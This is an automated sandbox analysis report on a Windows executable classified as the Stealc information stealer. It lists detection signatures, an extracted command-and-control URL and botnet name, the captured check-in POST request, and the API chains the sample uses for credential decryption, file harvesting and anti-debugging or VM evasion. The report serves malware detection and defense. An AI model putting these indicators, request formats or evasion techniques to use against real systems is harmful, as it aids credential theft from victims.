
Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1540589
MD5: 7abee0417c0e20b647a09a23767c082f
SHA1: 15fb1c418c08318532b0468e4e1fc39935647abb
SHA256: b6a02f7945ee3ffe763c9a12d10ad6d03c327e625b8b31fd9cfb615ed633f3dd
Tags: exe, user-Bitsight
Infos:

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 3228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 7ABEE0417C0E20B647A09A23767C082F)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs / Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |
Process Memory Space: file.exe PID: 3228 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
Process Memory Space: file.exe PID: 3228 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

Source | Rule | Description | Author | Strings
0.2.file.exe.930000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security |

No Sigma rule has matched

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-23T23:53:06.726996+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49730 | 185.215.113.37 | 80 | TCP

AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.930000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat | 0_2_0093C820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00939AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree | 0_2_00939AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00937240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree | 0_2_00937240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00939B60 CryptUnprotectData,LocalAlloc,LocalFree | 0_2_00939B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00948EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA | 0_2_00948EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_009438B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00944910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00944910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0093DA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0093E430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0093ED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00944570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00944570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0093F6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00943EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00943EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_009316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_009316D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0093DE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0093BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0093BE70

Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49730 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 33 35 31 36 33 42 31 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="hwid"6335163B10381806970752------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="build"doma------CFHIIEHJKKECGCBFIIJD--
Source: Joe Sandbox View | IP Address: 185.215.113.37 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00934880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle | 0_2_00934880
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CFHIIEHJKKECGCBFIIJDHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 33 33 35 31 36 33 42 31 30 33 38 31 38 30 36 39 37 30 37 35 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 48 49 49 45 48 4a 4b 4b 45 43 47 43 42 46 49 49 4a 44 2d 2d 0d 0a Data Ascii: ------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="hwid"6335163B10381806970752------CFHIIEHJKKECGCBFIIJDContent-Disposition: form-data; name="build"doma------CFHIIEHJKKECGCBFIIJD--
Source: file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/(
Source: file.exe, 00000000.00000002.1791344815.00000000015DF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1791344815.0000000001615000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1791344815.00000000015DF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php7
Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpC
Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpp
Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/o
Source: file.exe, 00000000.00000002.1791344815.00000000015F8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1791344815.000000000159E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37n0B

System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 | 0_2_00CFB8F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFE04D | 0_2_00CFE04D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00C3E877 | 0_2_00C3E877
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D0083C | 0_2_00D0083C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D0C1A4 | 0_2_00D0C1A4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D0712F | 0_2_00D0712F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CE949B | 0_2_00CE949B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D0E4A6 | 0_2_00D0E4A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D805DB | 0_2_00D805DB
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFED9D | 0_2_00CFED9D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D0A549 | 0_2_00D0A549
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D02ED2 | 0_2_00D02ED2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D0FE42 | 0_2_00D0FE42
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00BD4E20 | 0_2_00BD4E20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D05679 | 0_2_00D05679
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 009345C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: saegsldb ZLIB complexity 0.9947668576957428
Source: file.exe, 00000000.00000003.1731598111.0000000005300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1790693635.0000000000931000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00948680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle | 0_2_00948680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00943720 CoCreateInstance,MultiByteToWideChar,lstrcpyn | 0_2_00943720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\23T176HN.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: file.exe | Static file information: File size 1875968 > 1048576
Source: file.exe | Static PE information: Raw size of saegsldb is bigger than: 0x100000 < 0x1a3e00

Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.930000.0.unpack :EW;.rsrc :W;.idata :W; :EW;saegsldb:EW;mkoehnsu:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;saegsldb:EW;mkoehnsu:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00949860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1d9e8d should be: 0x1ce986
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: saegsldb
Source: file.exe | Static PE information: section name: mkoehnsu
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DAC8D7 push 29CD2D6Eh; mov dword ptr [esp], edi | 0_2_00DAC95C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00DF48FE push 5A05B6E4h; mov dword ptr [esp], ebp | 0_2_00DF495C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D290EC push ebp; mov dword ptr [esp], 770BF243h | 0_2_00D290F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push ebx; mov dword ptr [esp], ebp | 0_2_00CFB911
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push edi; mov dword ptr [esp], 6ABAD0BCh | 0_2_00CFBA40
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push ecx; mov dword ptr [esp], edx | 0_2_00CFBA4B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 58AB6F66h; mov dword ptr [esp], ebx | 0_2_00CFBA7E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push edi; mov dword ptr [esp], edx | 0_2_00CFBAD2
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push edx; mov dword ptr [esp], edi | 0_2_00CFBAD6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push ebx; mov dword ptr [esp], 3FC67B1Eh | 0_2_00CFBB4B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push edx; mov dword ptr [esp], 7EF6DE3Fh | 0_2_00CFBB78
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 6B944500h; mov dword ptr [esp], ebx | 0_2_00CFBBBE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 4DB4E3F8h; mov dword ptr [esp], esi | 0_2_00CFBBD1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push ebx; mov dword ptr [esp], ebp | 0_2_00CFBBE0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push eax; mov dword ptr [esp], esi | 0_2_00CFBD11
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 7F7B6459h; mov dword ptr [esp], eax | 0_2_00CFBD79
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 21606827h; mov dword ptr [esp], ebp | 0_2_00CFBDF8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push ecx; mov dword ptr [esp], 00000071h | 0_2_00CFBE35
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 6DDC358Fh; mov dword ptr [esp], eax | 0_2_00CFBE6E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 0F8FF536h; mov dword ptr [esp], edi | 0_2_00CFBEDC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push edx; mov dword ptr [esp], esp | 0_2_00CFBEE3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push ecx; mov dword ptr [esp], edi | 0_2_00CFBFB9
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push ebp; mov dword ptr [esp], esi | 0_2_00CFBFCD
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 37316102h; mov dword ptr [esp], esp | 0_2_00CFBFF8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 78F2EBF0h; mov dword ptr [esp], edi | 0_2_00CFC0B8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push edi; mov dword ptr [esp], 1C023584h | 0_2_00CFC11E
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push edi; mov dword ptr [esp], ebp | 0_2_00CFC20C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push 70E1FB75h; mov dword ptr [esp], edx | 0_2_00CFC25A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push eax; mov dword ptr [esp], edx | 0_2_00CFC392
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push ecx; mov dword ptr [esp], edi | 0_2_00CFC3C1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00CFB8F0 push esi; mov dword ptr [esp], ecx | 0_2_00CFC57E
Source: file.exe | Static PE information: section name: saegsldb entropy: 7.953512758642051

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00949860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00949860

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess | graph_0-13667
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1465A second address: D1465E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1465E second address: D14662 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D14662 second address: D14686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FDA2529D366h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FDA2529D370h 0x00000013 jc 00007FDA2529D366h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D14686 second address: D14694 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA252A1686h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D14694 second address: D1469A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1358D second address: D135BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA252A168Ch 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jmp 00007FDA252A168Ch 0x00000010 popad 0x00000011 jc 00007FDA252A1693h 0x00000017 jmp 00007FDA252A168Dh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D135BF second address: D135D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FDA2529D374h 0x0000000e pushad 0x0000000f js 00007FDA2529D366h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D13709 second address: D13724 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDA252A1692h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D13724 second address: D1372C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D1372C second address: D13757 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FDA252A1699h 0x00000008 jne 00007FDA252A1686h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
